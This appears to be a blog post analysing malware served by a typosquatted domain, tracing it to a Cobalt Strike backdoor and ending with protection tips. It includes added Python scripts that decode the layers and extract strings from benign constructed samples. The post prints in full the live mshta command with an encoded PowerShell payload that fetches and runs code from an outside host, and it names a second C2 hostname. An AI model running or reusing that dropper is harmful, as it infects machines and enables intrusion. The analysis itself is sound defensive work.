What is Typosquatting Malware?
Typosquatting malware is a type of cyber attack that involves registering a domain name that is very similar to a legitimate website.
The attacker then uses this domain to trick users into thinking they are visiting a legitimate site, when in fact they are visiting a malicious site that is designed to infect their computer with malware.
According to Wikipedia, “Typosquatting, also called URL hijacking, a sting site, or a fake URL, is a form of cybersquatting, and possibly brandjacking which relies on mistakes such as typos made by Internet users when inputting a website address into a web browser.
Should a user accidentally enter an incorrect website address, they may be led to any URL (including an alternative website owned by a cybersquatter).”
How Does Typosquatting Malware Work?
Typosquatting malware works by taking advantage of common typing errors that users make when trying to visit a website.
Cybercriminals create websites that look very similar to legitimate ones, with just a slight difference in the URL. For example, they might create a website called www.goggle.com instead of www.google.com. When a user mistypes the URL, they end up on the fake website, which can look almost identical to the real one.
The fake website is designed to trick the user into entering sensitive information, such as login credentials, credit card numbers, or other personal data. Once the user enters the information, the malware on the fake website can capture it and send it back to the cyber criminals.
Some cyber criminals purchase domains similar to the ones you visit every day, hoping that during one of those evenings you are trying to watch funny cat videos on youtube.com, you accidentally type youtubr.com (example).
In this write-up I will go over one such case I recently came across and analyze the malware that the malicious domain would download, with some (but not a whole lot of) technical detail.
In our example, if you had misspelled just one letter in the URL, you would be redirected to the following page (I am not providing the actual domain for confidentiality reasons).
As we can see from the any.run analysis, there is quite a lot going on once you navigate to this suspicious website.
The first command executed is:
mshta vbscript:createobject("wscript.shell").run("PowerShell -nop -exec bypass -Enc DQAKAGYAbwByACgAJABpAD0AMQA7ACQAaQAgAC0AbABlACAAMQAwADAAOwAkAGkAKwArACkADQAKAHsADQAKACQAYQA9ACcAaAB0AHQAcAA6AC8ALwBrADAAawB6AC4AcgB1AC8AaQAuAHAAaABwAD8AaQA9ADEAJwA7AGkAZQB4ACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACQAYQApADsATQBzAGkATQBhAGsAZQAoACIAJABhACIAKwAnADUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMwAwAA0ACgB9AA0ACgA=",0)(window.close)
mshta.exe is a Windows-native binary designed to execute Microsoft HTML Application (HTA) files. As its full name implies, Mshta can execute Windows Script Host code (VBScript and JScript) embedded within HTML in a network proxy-aware fashion.
As we can see, there is a base64 encoded payload run with PowerShell. Let's see what it does.
Looks like our base64 encoded PowerShell is trying to reach out to "http://kokz[.]ru/" to download a string and run it with IEX. The IEX (Invoke-Expression) cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command.
Interesting… let’s see what it is trying to download.
Woah! That's a lot of base64. Let's try to decode it and understand what it is doing.
After base64 decoding the string from the previous step we get this. It looks like yet another base64 encoded string, but now we can also see that the script is trying to decompress GZip-compressed data.
Let's base64 decode the string one more time and save it to a file. As we can see, the file command tells us that we have GZip compressed data, just as we guessed.
After extracting the GZip-compressed file we get another PowerShell script.
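The decoding steps above (the -Enc argument first, then the nested base64 and GZip layers) can be automated so the same chain does not have to be unpicked by hand each time. The following Python script is an added example, not code from the original write-up: it decodes a -EncodedCommand argument as base64 over UTF-16LE (which is why such blobs are full of "A" characters, the NUL high bytes), then repeatedly peels base64 and gzip layers until plain script text remains, and pulls URLs and Invoke-Expression usage out of every layer. The sample payload it builds for itself is constructed and benign (it points at the reserved name example.invalid); it is not the blob from the page.

```python
import base64
import gzip
import re

GZIP_MAGIC = b"\x1f\x8b"
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")                 # long base64-looking runs
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?:[:/][^\s'\"()]*)?")
IEX_RE = re.compile(r"\biex\b|invoke-expression", re.I)


def decode_enc_argument(blob: str) -> str:
    """Argument of PowerShell -EncodedCommand (-Enc/-e): base64 over UTF-16LE text."""
    return base64.b64decode(blob).decode("utf-16-le")


def looks_utf16le(data: bytes) -> bool:
    """ASCII text stored as UTF-16LE has a NUL in (almost) every odd byte position."""
    half = len(data) // 2
    return half > 0 and data[1::2].count(0) > 0.9 * half


def peel_layers(text: str, max_depth: int = 10) -> list:
    """Take the longest base64 run in the current layer, decode it, gunzip it when it
    starts with the gzip magic, then decode the result as UTF-16LE or UTF-8 text.
    Stops when no base64 run is left or the payload is binary (e.g. shellcode).
    Returns [(label, content), ...] with the innermost layer last."""
    layers = [("input", text)]
    for _ in range(max_depth):
        runs = B64_RUN.findall(layers[-1][1])
        if not runs:
            break
        try:
            raw = base64.b64decode(max(runs, key=len), validate=True)
        except ValueError:           # binascii.Error is a ValueError: not real base64
            break
        label = "base64"
        if raw.startswith(GZIP_MAGIC):
            raw = gzip.decompress(raw)
            label += "+gzip"
        if looks_utf16le(raw):
            layers.append((label + " (utf-16le)", raw.decode("utf-16-le")))
            continue
        try:
            layers.append((label, raw.decode("utf-8")))
        except UnicodeDecodeError:
            layers.append((label + " (binary)", raw.hex()))   # binary stage: stop here
            break
    return layers


def defang(url: str) -> str:
    """Render an indicator so it cannot be clicked or auto-linked in a report."""
    return url.replace("http", "hxxp").replace(".", "[.]")


def analyze(enc_blob: str) -> dict:
    """Peel every layer of an -Enc blob and collect indicators from all of them."""
    layers = peel_layers(enc_blob)
    urls = sorted({u for _, content in layers for u in URL_RE.findall(content)})
    return {
        "depth": len(layers) - 1,
        "labels": [label for label, _ in layers[1:]],
        "final": layers[-1][1],
        "urls": urls,
        "defanged": [defang(u) for u in urls],
        "invoke_expression": any(IEX_RE.search(content) for _, content in layers),
    }


def build_constructed_sample() -> str:
    """Constructed, benign stand-in for the chain seen on the page (not the real payload):
    script -> gzip -> base64 inside a FromBase64String stub -> base64 -> UTF-16LE -Enc.
    example.invalid is a reserved name and never resolves."""
    final_script = "iex(new-object net.webclient).downloadstring('http://example.invalid/i.php?i=1')"
    gz_b64 = base64.b64encode(gzip.compress(final_script.encode())).decode()
    stage2 = f"$g=[Convert]::FromBase64String('{gz_b64}');# gzip stream is decompressed next"
    stage2_b64 = base64.b64encode(stage2.encode()).decode()
    stage1 = f"$p='{stage2_b64}';iex([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($p)))"
    return base64.b64encode(stage1.encode("utf-16-le")).decode()


if __name__ == "__main__":
    report = analyze(build_constructed_sample())
    for label in report["labels"]:
        print("layer:", label)
    print("final script:", report["final"])
    print("urls:", report["defanged"], "| uses IEX:", report["invoke_expression"])
```

On the page's real blob the script would stop after the first layer, because that layer only contains the download URL; the downloaded string (layers two and three) would be pasted in as a new input. Keeping the defanged URL list per layer is what ends up in the ticket or the blocklist, not the decoded script itself.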
The following piece of code looks particularly interesting.
Here we have another base64 encoded payload: it is first base64 decoded, and then some byte arithmetic is done on it inside a for loop. Let's see what it is exactly and, as any cautious person would do, run the lines in the PowerShell interpreter on our machine (NSFW).
We let PowerShell do the arithmetic; that way we have less code to write. What we end up with is a variable "$var_code" with around 800 lines of different numbers.
I wrote a small Python script to convert the decimals we got from the PowerShell script into a byte array and write it to a file.
Let's run the Python script, which will write $var_code to the out.bin file.
Hmm… sus. Looks like a binary file with some gibberish, but also some useful strings which are readable.
We are left with what appears to be the shellcode. With the strings command we can also see the host "cdn.hmthiooace.cfd".
Let's check out the file "out.bin" and the hostname found in the strings output on VirusTotal.
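The conversion from the $var_code number list to a file, and the strings step that follows, as an added Python example. The author's own script is not shown on the page, so this is not it: it assumes the PowerShell output is one integer per line and also accepts comma-separated or 0x-prefixed values (masking to 8 bits so signed [sbyte] output such as -1 still becomes 0xFF). The byte dump and the hostname cdn.example.invalid inside it are constructed for the example, and the regex-based extraction stands in for the strings command (including the UTF-16LE strings that `strings -el` would report).

```python
import re
from pathlib import Path


def parse_byte_dump(dump: str) -> bytes:
    """Turn console output of a PowerShell byte array (one integer per line, or
    comma/space separated, decimal or 0x-prefixed) into raw bytes."""
    out = bytearray()
    for tok in re.split(r"[\s,]+", dump.strip()):
        if not tok:
            continue
        value = int(tok, 16) if tok.lower().startswith(("0x", "-0x")) else int(tok)
        out.append(value & 0xFF)          # -1 -> 0xFF, 200 -> 0xC8
    return bytes(out)


def extract_strings(data: bytes, min_len: int = 4) -> list:
    """Equivalent of strings(1): printable-ASCII runs of at least min_len,
    followed by UTF-16LE runs (what `strings -el` reports)."""
    ascii_runs = re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)
    wide_runs = re.findall(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len, data)
    return [r.decode("ascii") for r in ascii_runs] + [r.decode("utf-16-le") for r in wide_runs]


HOST_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)
FILE_EXTENSIONS = {"dll", "exe", "sys", "ocx"}   # filenames match the host pattern too


def find_hostnames(found: list) -> list:
    """Pick hostname-looking strings out of the strings output, dropping things like
    kernel32.dll that only look like a hostname."""
    hosts = set()
    for s in found:
        for cand in HOST_RE.findall(s):
            if cand.rsplit(".", 1)[-1].lower() not in FILE_EXTENSIONS:
                hosts.add(cand.lower())
    return sorted(hosts)


def defang(host: str) -> str:
    return host.replace(".", "[.]")


# Constructed stand-in for the decoded $var_code bytes (not the page's shellcode).
CONSTRUCTED_BYTES = (
    b"\x00\x01\x02ab\x00"                                   # noise; "ab" is too short to report
    + b"cdn.example.invalid\x00\x90\x90"                    # constructed hostname, reserved TLD
    + "kernel32.dll".encode("utf-16-le") + b"\x00\x00"       # wide string, as Windows imports often are
    + b"GET /gate HTTP/1.1\xff\xfe"
)


def constructed_dump() -> str:
    """PowerShell-style console dump of CONSTRUCTED_BYTES, one signed value per line,
    the way $var_code prints after [sbyte] arithmetic."""
    return "\n".join(str(b - 256 if b > 127 else b) for b in CONSTRUCTED_BYTES)


def analyze_dump(dump: str, out_path=None) -> dict:
    """Parse the dump, optionally write out.bin, and report strings and hostnames."""
    blob = parse_byte_dump(dump)
    if out_path:
        Path(out_path).write_bytes(blob)
    found = extract_strings(blob)
    hosts = find_hostnames(found)
    return {"size": len(blob), "strings": found, "hosts": hosts,
            "defanged": [defang(h) for h in hosts]}


if __name__ == "__main__":
    report = analyze_dump(constructed_dump(), "out.bin")
    print(report["size"], "bytes written to out.bin")
    print("strings:", report["strings"])
    print("hosts:", report["defanged"])
```

The file written this way is what goes to VirusTotal or a sandbox; the defanged hostnames are what goes into the DNS blocklist. Hashing out.bin with sha256sum before uploading gives a lookup key without sharing the sample.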
Numerous security vendors identify the file as a CobaltStrike backdoor. I guess we will go with that!
BLUF: try not to fat-finger wrong URLs 🙂
How to Protect Yourself from Typosquatting Malware
There are several steps you can take to protect yourself from typosquatting malware:
- Be careful when entering web addresses: Double-check the URL before hitting “Enter” to ensure you are on the legitimate website.
- Use a password manager: Password managers can help protect your login credentials from being stolen by malware.
- Keep your software up-to-date: Cybercriminals often exploit security vulnerabilities in outdated software to infect devices with malware. Make sure you regularly update your software to protect yourself.
- Use antivirus software: Antivirus software can detect and remove malware from your device. Make sure you have a reputable antivirus program installed and keep it up-to-date.
In conclusion, typosquatting malware is a serious threat to businesses and individuals alike. By understanding how it works and taking steps to protect yourself, you can reduce your risk of falling victim to this type of attack. If you have any questions or concerns about typosquatting malware, please don’t hesitate to contact us for more information.